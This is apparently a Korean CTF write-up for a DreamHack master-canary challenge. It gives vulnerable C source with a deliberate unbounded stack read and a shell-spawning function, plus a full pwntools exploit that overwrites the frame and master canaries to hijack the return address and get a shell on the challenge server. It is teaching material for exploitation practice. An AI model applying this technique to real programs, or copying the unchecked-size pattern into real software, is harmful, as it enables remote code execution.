문제 코드

// Name: mc_thread.c
// Compile: gcc -o mc_thread mc_thread.c -pthread -no-pie
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
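/*
 * Spawn an interactive shell. This is the exploit's target ("win") function;
 * the exploit resolves it by symbol name, so the name must stay `giveshell`.
 * argv[0] is supplied explicitly: execve() with a NULL argv is a Linux-only
 * extension that POSIX does not guarantee. Only returns if execve() fails.
 */
void giveshell() {
  char *const argv[] = { "/bin/sh", NULL };
  execve("/bin/sh", argv, NULL);
}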
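/*
 * Disable stdio buffering on stdin and stdout so prompts are written
 * immediately and input is consumed as it arrives (the usual setup for a
 * challenge served over a socket). `_IONBF` replaces the magic value 2,
 * which is glibc's encoding of the same mode.
 */
void init() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
}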

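/*
 * Read up to `len` bytes from stdin (fd 0) into `buf`, one byte at a time.
 *
 * Returns the number of bytes actually stored in `buf`. Reading stops early
 * when read() fails (ret < 0) or hits end-of-file (ret == 0). The original
 * only checked for failure and kept incrementing the count on EOF, so it
 * could report `len` bytes that were never read and spin on a closed input.
 *
 * No bound other than `len` is applied to `buf`: the caller must guarantee
 * `len <= sizeof buf`. A NULL `buf` or a `len` of zero or less reads
 * nothing and returns 0.
 */
int read_bytes (char *buf, int len) {
  int read_len = 0;

  if (buf == NULL || len <= 0) {
    return 0;
  }

  while (read_len < len) {
    ssize_t ret = read(0, buf + read_len, 1);
    if (ret <= 0) {
      break;  /* error or EOF: report only what was really read */
    }
    read_len++;
  }

  return read_len;
}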

/*
 * Thread body: prompt for a byte count, then read that many bytes from
 * stdin into a 256-byte stack buffer.
 *
 * NOTE(review): this is the challenge's intended vulnerability and is left
 * as-is so the write-up's exploit still applies. `size` comes straight from
 * scanf() and is never compared against `sizeof buf`, so read_bytes() writes
 * past the end of `buf`: over the frame's stack canary and the saved return
 * address, and — with a large enough `size`, as the exploit below does at
 * offset 0x948 — over the master canary (the reference value the canary
 * check compares against). Because the check only requires the two values
 * to match, writing the same 8 bytes to both slots defeats it. A fixed
 * version would check scanf()'s return value and reject or clamp
 * `size > sizeof buf`.
 */
void thread_routine() {
  char buf[256];
  int size = 0;

  fputs("Size: ", stdout);
  (void)scanf("%d", &size);        /* unchecked: size may be anything */
  fputs("Data: ", stdout);
  (void)read_bytes(buf, size);     /* no bound against sizeof buf */
}

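/*
 * pthread entry adapter. pthread_create() expects `void *(*)(void *)`;
 * casting thread_routine (declared `void thread_routine()`) to `void *` and
 * calling it through the wrong function type is undefined behavior, even
 * though it happens to work on x86-64 glibc.
 */
static void *thread_entry(void *arg) {
  (void)arg;
  thread_routine();
  return NULL;
}

/*
 * Program entry: unbuffer stdio, run thread_routine() in a new thread and
 * wait for it to finish.
 *
 * pthread_create()/pthread_join() report failure as a positive error number
 * and leave errno untouched, so the original `< 0` test could never fire and
 * perror() would have printed an unrelated errno (with a doubled colon).
 * Failures now go to stderr via strerror(rc) and exit non-zero.
 */
int main() {
  pthread_t thread_t;
  int rc;

  init();

  rc = pthread_create(&thread_t, NULL, thread_entry, NULL);
  if (rc != 0) {
    fprintf(stderr, "thread create error: %s\n", strerror(rc));
    exit(EXIT_FAILURE);
  }

  rc = pthread_join(thread_t, NULL);
  if (rc != 0) {
    fprintf(stderr, "thread join error: %s\n", strerror(rc));
    exit(EXIT_FAILURE);
  }

  return 0;
}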

 

바로 이전에서 학습한 코드와 같으므로 같은 분석 방법을 사용해서 스택 오버플로우를 통해 카나리를 덮어쓸 것이다. 스레드의 스택 버퍼 `buf[256]`에 입력 길이 `size`를 검사하지 않고 `read_bytes()`로 읽어 들이므로, 프레임의 카나리와 반환 주소뿐 아니라 그 뒤(아래 익스플로잇 기준 `buf`로부터 0x948 바이트 지점)에 있는 마스터 카나리까지 같은 값으로 덮어쓰면 카나리 검사를 통과할 수 있다.

https://dacoding.tistory.com/72

 

[DreamHack System Hacking] Master Canary - (1)


 

 

익스플로잇 코드

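# Name: mc_thread.py
# Exploit for mc_thread. The thread's stack buffer overflow reaches the
# frame canary, the saved return address and, 0x948 bytes past buf, the
# master canary the check compares against. Writing the same 8 bytes to both
# canary slots makes the check pass, and the return lands in giveshell().
from pwn import *

#p = process("./mc_thread")
p = remote("host3.dreamhack.games", 19360)
elf = ELF('./mc_thread')
giveshell = elf.symbols['giveshell']

CANARY_OFFSET = 264            # distance from buf to the frame canary (from the stack analysis in the previous post)
MASTER_CANARY_OFFSET = 0x948   # distance from buf to the master canary for this build
canary = b"A" * 8              # value written to BOTH canary slots; they only need to match

payload = b"A" * CANARY_OFFSET
payload += canary              # frame canary
payload += b"B" * 8            # saved rbp
payload += p64(giveshell)      # saved return address -> giveshell()
payload += b"A" * (MASTER_CANARY_OFFSET - len(payload))
payload += canary              # master canary: must equal the frame canary bytes above

inp_sz = len(payload)
# Send bytes, not str: avoids the str/bytes mismatch pwntools warns about on Python 3.
p.sendlineafter(b"Size: ", str(inp_sz).encode())
p.sendlineafter(b"Data: ", payload)
p.interactive()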
